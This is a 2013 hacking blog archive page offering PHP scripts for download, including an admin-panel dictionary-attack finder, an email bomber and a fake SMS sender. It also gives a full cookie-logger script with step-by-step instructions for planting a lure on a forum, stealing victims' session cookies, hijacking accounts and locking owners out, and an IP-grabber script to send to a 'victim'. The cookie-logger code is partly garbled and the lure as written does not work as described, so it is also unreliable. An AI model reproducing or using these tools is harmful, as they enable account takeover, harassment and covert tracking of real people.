Showing posts with label Scripts. Show all posts
Showing posts with label Scripts. Show all posts

Tuesday, 12 November 2013

Admin Panel Finder [PHP]

Description:

"Admin Panel Finder" is an online penetration script which finds the admin panel of the website which you indicated.

It finds the admin panels via Dictionary Attack method through an internal hosted list and shows the admin panel.

Screenshot:



Link:

                       DOWNLOAD

Thanks for visiting my BLOG!

Friday, 8 November 2013

Create Your Own Forum Script [PHP]

MyBB Forum:



Screenshot:


If you want to create your own forum then you can download the forum script from the below link:

                                  DOWNLOAD

Note:

  • You only have to first install your forum script.

  • You can do this by using this address:

                     www.yourwebsite.com/install

Thanks 4 visiting my BLOG!!!

Thursday, 7 November 2013

Download Crypo.com site script in PHP

Crypo.com


  • Protect your critical passwords with strong encryption online.


  • Encrypt and Decrypt sensitive data using strong encryptors (free security online tools).


Screenshot:


Details:
  • crypo.com is a site which is used to encrypt and decrypt data...
  • If you guys are whishing to create your own site like this then you are in right place...
  • You can simply download this site PHP files from the below link:

                                DOWNLOAD

I hope you will like!

Thanks 4 visiting my BLOG!!!

Tuesday, 5 November 2013

Create You Own Site Like Adf.ly

Hello! Everyone is know about adf.ly ( a site 

which get paid to share your links on the Internet  )

So in this post i'll share with you adf.ly clone script 

from which you can create your own site like 

adf.ly.....


You can also pay to your members if they fulfil your

terms and conditions...

Here it is:




You can download the adf.ly clone from this link:


                      DOWNLOAD


Instructions will be available in a .pdf file , you can 

build you site with these instructions...

You will like it...

Thanks 4 visiting my BLOG!!!

Monday, 4 November 2013

Mp3Skull.com Searcher [PHP]

Hy Visitors! Today am getting bored so i decided to make a nice mp3 searcher (downloader) in php with a beautiful style .....

Just for enjoying!


Here's the screenshot of the searcher:





You can download searcher PHP script from the below link:

                               DOWNLOAD

I hope you will like...


Thanks 4 visiting my BLOG!!! Big Grin

Friday, 1 November 2013

Free and Fast Email Bomber Script [PHP]

Hy Everyone!! Today am gonna publish free and fast Email Bomber Script [PHP] from which you can send a lot of emails on any Email Address...

Here it is a screen shot of that email bomber , actually how it looks like...





From the below link you can download Email Bomber PHP script...

                            DOWNLOAD

I hope you will like!!

Thanks 4 visiting my BLOG!!!

Tuesday, 29 October 2013

Fake Sms Script by A-T

Here you can download Fake Sms Script which support NEXMO , put you own API Key and Secret and enjoy!
It has a feature to store your messages history!
Download link is below:



                                        
                                        DOWNLOAD
                                         pass: adnant

Thanks 4 visiting my BLOG!!!

Sunday, 27 October 2013

Create a Cookie Logger and Hack any Account!

A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim.
Today I am going to show How to make your own Cookie Logger…
Hope you will enjoy Reading it...

STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif

<a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>

STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php


$filename = “logfile.txt”;
if (isset($_GET["cookie"]))
{
if (!$handle = fopen($filename, ‘a’))
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
else
{
if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE)
{
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
}
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
fclose($handle);
exit;
}
echo “Temporary Server Error,Sorry for the inconvenience.”;
exit;
?>

STEP 3: Create a new Notepad File and Save it as logfile.txt
STEP 4: Upload this file to your server
cookielogger.php - > http://www.yoursite.com/cookielogger.php
logfile.txt- > http://www.yoursite.com/logfile.txt
fun.gif - > http://www.yoursite.com/fun.gif
If you don’t have any Website then you can use the following Website to get a Free Website which has php support:

http://www.000webhost.com/

STEP 5: Go to the victim forum and insert this code in the signature or a post :

<a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a>

STEP 6: When the victim see the post he view the image u uploaded but when he click the image he has a Temporary Error and you will get his cookie in log.txt . The Cookie Would Look as Follows:

phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A6% ​3A%22userid%22%3Bi%3A-1%3B%7D; phpbb2mysql_sid=3ed7bdcb4e9e41737ed6eb41c43a4ec9

STEP 7: To get the access to the Victim’s Account you need to replace your cookies with the Victim’s Cookie. You can use a Cookie Editor for this. The string before “=” is the name of the cookie and the string after “=” is its value. So Change the values of the cookies in the cookie Editor.

STEP 8: Goto the Website whose Account you have just hacked and You will find that you are logged in as the Victim and now you can change the victim’s account information.

NOTE: Make Sure that from Step 6 to 8 the Victim should be Online because you are actually Hijacking the Victim’s Session So if the Victim clicks on Logout you will also Logout automatically but once you have changed the password then you can again login with the new password and the victim would not be able to login.........



Thanks 4 visiting my BLOG!!!!

How To Get Someone IP with PHP

HY visitors! Here in this will teach you ''how to get someone IP and other details like port & browser etc etc with PHP"......

1: Simply copy this script  and make a PHP file with this:




<?php

//IP Grabber

//Variables

$protocol = $_SERVER['SERVER_PROTOCOL'];
$ip = $_SERVER['REMOTE_ADDR'];
$port = $_SERVER['REMOTE_PORT'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$ref = $_SERVER['HTTP_REFERER'];
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);

//Print IP, Hostname, Port Number, User Agent and Referer To Log.TXT

$fh = fopen('log.txt', 'a');
fwrite($fh, 'IP Address: '."".$ip ."\n");
fwrite($fh, 'Hostname: '."".$hostname ."\n");
fwrite($fh, 'Port Number: '."".$port ."\n");
fwrite($fh, 'User Agent: '."".$agent ."\n");
fwrite($fh, 'HTTP Referer: '."".$ref ."\n\n");
fclose($fh);
?>




2: Then upload on any hosting site and send link to victim.

3: Victim information will save in a file called 'log.txt'

IF you are having some problem to make file you can download this script from the following link:

                            Download

Thanks 4 visiting my BLOG!!!!